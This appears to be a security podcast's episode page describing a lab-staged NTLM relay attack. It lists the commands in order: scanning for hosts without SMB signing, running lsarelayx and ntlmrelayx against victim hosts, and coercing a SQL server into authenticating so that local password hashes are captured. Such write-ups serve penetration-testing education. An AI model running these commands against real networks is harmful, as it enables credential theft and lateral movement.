Episode Details

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

In today's episode we staged an NTLM relay attack using a vulnerable SQL server.

First we used CrackMapExec (see our two part series on Cracking and Mapping and Execing with CrackMapExec - part 1 / part 2) to find hosts with SMB signing disabled:

 cme smb x.x.x.x/24 -u USER -p PASS --gen-relay-list smbsigning.txt 

Then we setup lsarelayx in one window:

lsarelayx --host=localhost 

And in a second window we ran ntlmrelayx.py:

 python ntlmrelayx.py -smb2support --no-smb-server -t smb://VICTIM 

Finally, in a third window we triggered authentication from the vulnerable SQL server:

 Invoke-SQLUncPathInjection -verbose -captureip OUR.ATTACKING.IP.ADDRESS 

Boom! Watch the local usernames and hashes fall out of the victim system.

We also tried doing a multirelay scenario where we had a list of victim hosts in a targets.txt file like this:

victim1 victim2 victim3 

Then we tweaked the ntlmrelayx command slightly:

 python ntlmrelayx.py -smb2support --no-smb-server -tf targets.txt 

Interestingly(?) only victim2 was attacked.

Lastly, we ran the same attack but added the -socks option to establish SOCKS connections upon successful relay:

 python ntlmrelayx.py -smb2support --no-smb-server -tf targets.txt -socks 

Interestingly(?) we got a low-priv user to relay and setup a SOCKS connection, but not the domain admin configured on the SQL server.

TLDR/TLDL: relaying credentials to a single victim with ntlmrelay on a Windows hosts seems to work great! Your milage may vary if you try to pull off more advanced tricks with ntlmrelay.